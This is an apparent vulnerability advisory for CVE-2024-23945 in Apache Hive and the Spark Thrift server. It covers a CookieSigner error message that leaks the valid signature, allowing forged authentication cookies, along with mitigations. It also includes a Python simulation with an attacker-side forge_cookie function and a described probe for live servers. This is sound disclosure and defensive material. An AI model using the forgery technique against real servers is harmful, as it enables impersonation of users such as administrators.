PT-2023-9835 · Apache · Apache Spark, Apache Hive

Hamza Tahmi

Published 2023-10-17 · Updated 2025-07-14

CVE-2024-23945

CVSS v3.1: 5.9 (Medium)
Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
Name of the Vulnerable Software and Affected Versions
Apache Hive versions 1.2.0 and later; Apache Spark versions 2.0.0 and later. The Spark Thrift server embeds HiveServer2, so both products ship the same CookieSigner logic. Affected components: org.apache.hive:hive-service, org.apache.spark:spark-hive-thriftserver_2.11 and org.apache.spark:spark-hive-thriftserver_2.12.

Description
HiveServer2 in HTTP transport mode (and the Spark Thrift server, which embeds it) can issue a signed authentication cookie so that subsequent requests from the same client skip re-authentication. The cookie consists of a raw value followed by a signature computed with a secret held only by the server; on each request the CookieSigner recomputes the signature over the presented value and rejects the cookie if the two do not match. In the affected versions the exception raised on that mismatch includes the correct, freshly recomputed signature for the value the client submitted (CWE-209, Generation of Error Message Containing Sensitive Information). Wherever that exception text is surfaced to the client, in an HTTP error response or an accessible log, an unauthenticated attacker can submit a cookie carrying a value of their choosing with a bogus signature, read the correct signature out of the error, and resubmit the same value with a now-valid signature, i.e. forge the cookie for an arbitrary user without knowing the server secret. The CVSS vector reflects this: no direct confidentiality loss, high integrity impact (forged authentication state), and high attack complexity because the error has to reach the attacker.

Recommendations
For Apache Hive 1.2.0 and later and Apache Spark 2.0.0 and later, update to a release in which the CookieSigner no longer includes the recomputed signature in its error message. Until the update is in place, disable cookie-based authentication for the Thrift HTTP transport (hive.server2.thrift.http.cookie.auth.enabled=false; the Spark Thrift server reads the same property from its Hive configuration), or run the binary transport instead of HTTP, which does not use the cookie at all. Restrict network access to the Thrift HTTP endpoint exposed by org.apache.hive:hive-service and org.apache.spark:spark-hive-thriftserver_2.11 / _2.12, and make sure error responses and server logs that could contain the message "Invalid sign, original = ... current = ..." are not readable by untrusted clients.
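The following Python model, added here for illustration and not code from Hive or Spark, shows why the leaked signature is enough to forge a cookie. The layout mirrors Hive's CookieSigner (raw value, an "&s=" marker, then a hex SHA-256 over the value concatenated with a random server secret), but the class and function names, the "cu=<user>&rn=<nonce>" sample values and the "admin" target are assumptions made for the example. The same signer is run once with the vulnerable error message and once with the fixed one, so the two outcomes can be compared directly.

```python
import hashlib
import hmac
import re
import secrets
from typing import Callable, Optional

# Model of a signed-cookie scheme in the style of Hive's CookieSigner:
# raw value, then an "&s=" marker, then SHA-256(value || secret) in hex.
# Added illustration of CVE-2024-23945, not Hive's or Spark's own code.
SIGNATURE_MARKER = "&s="


class CookieSigner:
    def __init__(self, secret: bytes, leak_signature_in_error: bool) -> None:
        self._secret = secret
        # True models the affected releases, False the fixed behaviour.
        self._leak = leak_signature_in_error

    def _signature(self, raw_value: str) -> str:
        return hashlib.sha256(raw_value.encode() + self._secret).hexdigest()

    def sign(self, raw_value: str) -> str:
        return raw_value + SIGNATURE_MARKER + self._signature(raw_value)

    def verify_and_extract(self, signed: str) -> str:
        idx = signed.rfind(SIGNATURE_MARKER)
        if idx == -1:
            raise ValueError("Invalid input sign")
        raw_value = signed[:idx]
        presented = signed[idx + len(SIGNATURE_MARKER):]
        current = self._signature(raw_value)
        if not hmac.compare_digest(presented.encode(), current.encode()):
            if self._leak:
                # CWE-209: the rejection message hands back the correct
                # signature for whatever value the client chose to submit.
                raise ValueError(
                    f"Invalid sign, original = {presented} current = {current}"
                )
            raise ValueError("Invalid sign")
        return raw_value


def forge_cookie(verify: Callable[[str], str], target_value: str) -> Optional[str]:
    """Attacker side: submit the wanted value with a bogus signature, harvest
    the 'current = <sig>' leaked by the error, and rebuild a valid cookie."""
    probe = target_value + SIGNATURE_MARKER + "0" * 64
    try:
        verify(probe)
        return probe  # only reachable if the bogus signature were accepted
    except ValueError as exc:
        leaked = re.search(r"current = ([0-9a-f]{64})", str(exc))
        if leaked is None:
            return None  # nothing usable leaked: fixed behaviour
        return target_value + SIGNATURE_MARKER + leaked.group(1)


def attacker_succeeds(leak_signature_in_error: bool) -> bool:
    """Run the forgery against a server holding a fresh random secret.
    Cookie values are constructed samples shaped like 'cu=<user>&rn=<nonce>'."""
    signer = CookieSigner(secrets.token_bytes(32), leak_signature_in_error)
    legit = signer.sign("cu=alice&rn=1234")
    if signer.verify_and_extract(legit) != "cu=alice&rn=1234":
        raise RuntimeError("a legitimately signed cookie must verify")
    forged = forge_cookie(signer.verify_and_extract, "cu=admin&rn=1234")
    if forged is None:
        return False
    try:
        return signer.verify_and_extract(forged) == "cu=admin&rn=1234"
    except ValueError:
        return False


if __name__ == "__main__":
    print("forgery against leaking server:", attacker_succeeds(True))   # True
    print("forgery against fixed server:  ", attacker_succeeds(False))  # False
```

The attacker never learns the secret; the server does the signing for them. That is why the fix is simply to stop echoing the recomputed signature: the constant-time comparison and the secret are already sound, and once the error message carries only the presented (wrong) signature, the probe yields nothing. When assessing a live HiveServer2 or Spark Thrift server, the same probe, a request with a syntactically valid cookie whose signature is wrong, tells you whether the build is affected: a vulnerable build raises an IllegalArgumentException whose text contains "current = " followed by the valid signature.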

Weakness Enumeration

CWE-209: Generation of Error Message Containing Sensitive Information

Related Identifiers

BDU:2025-00249
CVE-2024-23945
GHSA-77PM-W3HX-F8MJ
OESA-2025-1039

Affected Products

Apache Hive
Apache Spark